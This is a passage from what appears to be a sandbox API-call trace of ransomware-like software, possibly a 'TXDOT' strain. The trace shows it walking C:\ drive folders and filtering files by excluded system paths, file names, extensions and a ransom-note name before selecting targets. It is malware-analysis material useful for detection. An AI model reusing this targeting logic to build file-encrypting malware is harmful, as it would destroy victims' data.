returned="C:\\588bce7c90097ed212\\" [0071.762] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" [0071.762] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0071.762] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="iconcache.db") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="thumbs.db") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransomware ") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransom ") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="debug.txt") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="boot.ini") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="desktop.ini") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="autorun.inf") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntldr") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.762] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0071.762] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.762] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0071.762] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0071.763] GetProcessHeap () returned 0xe30000 [0071.763] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec6e60 | out: hHeap=0xe30000) returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0071.763] StrCmpW (psz1="Boot", psz2=".") returned 1 [0071.763] StrCmpW (psz1="Boot", psz2="..") returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0071.763] StrCmpW (psz1="bootmgr", psz2=".") returned 1 [0071.763] StrCmpW (psz1="bootmgr", psz2="..") returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0071.763] StrCmpW (psz1="BOOTNXT", psz2=".") returned 1 [0071.763] StrCmpW (psz1="BOOTNXT", psz2="..") returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0071.763] StrCmpW (psz1="BOOTSECT.BAK", psz2=".") returned 1 [0071.763] StrCmpW (psz1="BOOTSECT.BAK", psz2="..") returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0071.763] StrCmpW (psz1="Documents and Settings", psz2=".") returned 1 [0071.763] StrCmpW (psz1="Documents and Settings", psz2="..") returned 1 [0071.763] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0071.763] StrCmpW (psz1="ESD", psz2=".") returned 1 [0071.763] StrCmpW (psz1="ESD", psz2="..") returned 1 [0071.763] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0071.763] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0071.763] StrNCatW (in: psz1="C:\\", psz2="ESD", cchMax=1030 | out: psz1="C:\\ESD") returned="C:\\ESD" [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system32\\") returned 0x0 [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system\\") returned 0x0 [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.763] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\local\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\boot\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\perflogs\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\programdata\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\drivers\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\wsus\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="crypt_detect") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="cryptolocker") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="ransomware") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\WINDOWS") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.764] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files") returned 0x0 [0071.764] GetProcessHeap () returned 0xe30000 [0071.764] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48e) returned 0xecab68 [0071.764] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ESD", cchMax=1038 | out: psz1="C:\\ESD") returned="C:\\ESD" [0071.764] StrNCatW (in: psz1="C:\\ESD", psz2="\\*", cchMax=1038 | out: psz1="C:\\ESD\\*") returned="C:\\ESD\\*" [0071.764] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0071.817] StrCmpW (psz1=".", psz2=".") returned 0 [0071.817] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.818] StrCmpW (psz1="..", psz2=".") returned 1 [0071.818] StrCmpW (psz1="..", psz2="..") returned 0 [0071.818] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0071.818] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0071.818] GetProcessHeap () returned 0xe30000 [0071.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.818] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0071.818] StrCmpW (psz1="hiberfil.sys", psz2=".") returned 1 [0071.818] StrCmpW (psz1="hiberfil.sys", psz2="..") returned 1 [0071.818] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0071.818] StrCmpW (psz1="Logs", psz2=".") returned 1 [0071.818] StrCmpW (psz1="Logs", psz2="..") returned 1 [0071.818] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0071.818] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0071.818] StrNCatW (in: psz1="C:\\", psz2="Logs", cchMax=1030 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.818] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\boot\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="crypt_detect") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="cryptolocker") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="ransomware") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.819] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0071.819] GetProcessHeap () returned 0xe30000 [0071.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x490) returned 0xecab68 [0071.819] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.819] StrNCatW (in: psz1="C:\\Logs", psz2="\\*", cchMax=1040 | out: psz1="C:\\Logs\\*") returned="C:\\Logs\\*" [0071.819] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0071.828] StrCmpW (psz1=".", psz2=".") returned 0 [0071.828] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.850] StrCmpW (psz1="..", psz2=".") returned 1 [0071.850] StrCmpW (psz1="..", psz2="..") returned 0 [0071.850] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0071.850] StrCmpW (psz1="Application.evtx", psz2=".") returned 1 [0071.850] StrCmpW (psz1="Application.evtx", psz2="..") returned 1 [0071.850] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.850] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.850] StrNCatW (in: psz1="C:\\Logs\\", psz2="Application.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Application.evtx") returned="C:\\Logs\\Application.evtx" [0071.850] PathFindExtensionW (pszPath="Application.evtx") returned=".evtx" [0071.850] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2="bootsect.bak") returned -1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2="iconcache.db") returned -1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2="thumbs.db") returned -1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2=" ransomware ") returned 1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2=" ransom ") returned 1 [0071.850] StrCmpIW (psz1="Application.evtx", psz2="debug.txt") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="boot.ini") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="desktop.ini") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="autorun.inf") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="ntuser.dat") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="ntldr") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="ntdetect.com") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="bootfont.bin") returned -1 [0071.851] StrCmpIW (psz1="Application.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.851] PathFindExtensionW (pszPath="Application.evtx") returned=".evtx" [0071.851] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.851] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.851] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.852] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.852] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.852] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.852] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.852] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0071.852] StrCmpW (psz1="HardwareEvents.evtx", psz2=".") returned 1 [0071.852] StrCmpW (psz1="HardwareEvents.evtx", psz2="..") returned 1 [0071.852] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.852] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.852] StrNCatW (in: psz1="C:\\Logs\\", psz2="HardwareEvents.evtx", cchMax=1040 | out: psz1="C:\\Logs\\HardwareEvents.evtx") returned="C:\\Logs\\HardwareEvents.evtx" [0071.852] PathFindExtensionW (pszPath="HardwareEvents.evtx") returned=".evtx" [0071.852] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.852] StrCmpIW (psz1="HardwareEvents.evtx", psz2="bootsect.bak") returned 1 [0071.852] StrCmpIW (psz1="HardwareEvents.evtx", psz2="iconcache.db") returned -1 [0071.852] StrCmpIW (psz1="HardwareEvents.evtx", psz2="thumbs.db") returned -1 [0071.852] StrCmpIW (psz1="HardwareEvents.evtx", psz2=" ransomware ") returned 1 [0071.852] StrCmpIW (psz1="HardwareEvents.evtx", psz2=" ransom ") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="debug.txt") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="boot.ini") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="desktop.ini") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="autorun.inf") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntuser.dat") returned -1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntldr") returned -1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntdetect.com") returned -1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="bootfont.bin") returned 1 [0071.853] StrCmpIW (psz1="HardwareEvents.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.853] PathFindExtensionW (pszPath="HardwareEvents.evtx") returned=".evtx" [0071.853] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.853] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.853] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.853] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.853] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.853] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.853] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.853] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0071.853] StrCmpW (psz1="Internet Explorer.evtx", psz2=".") returned 1 [0071.853] StrCmpW (psz1="Internet Explorer.evtx", psz2="..") returned 1 [0071.853] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.853] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.853] StrNCatW (in: psz1="C:\\Logs\\", psz2="Internet Explorer.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Internet Explorer.evtx") returned="C:\\Logs\\Internet Explorer.evtx" [0071.854] PathFindExtensionW (pszPath="Internet Explorer.evtx") returned=".evtx" [0071.854] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="bootsect.bak") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="iconcache.db") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="thumbs.db") returned -1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2=" ransomware ") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2=" 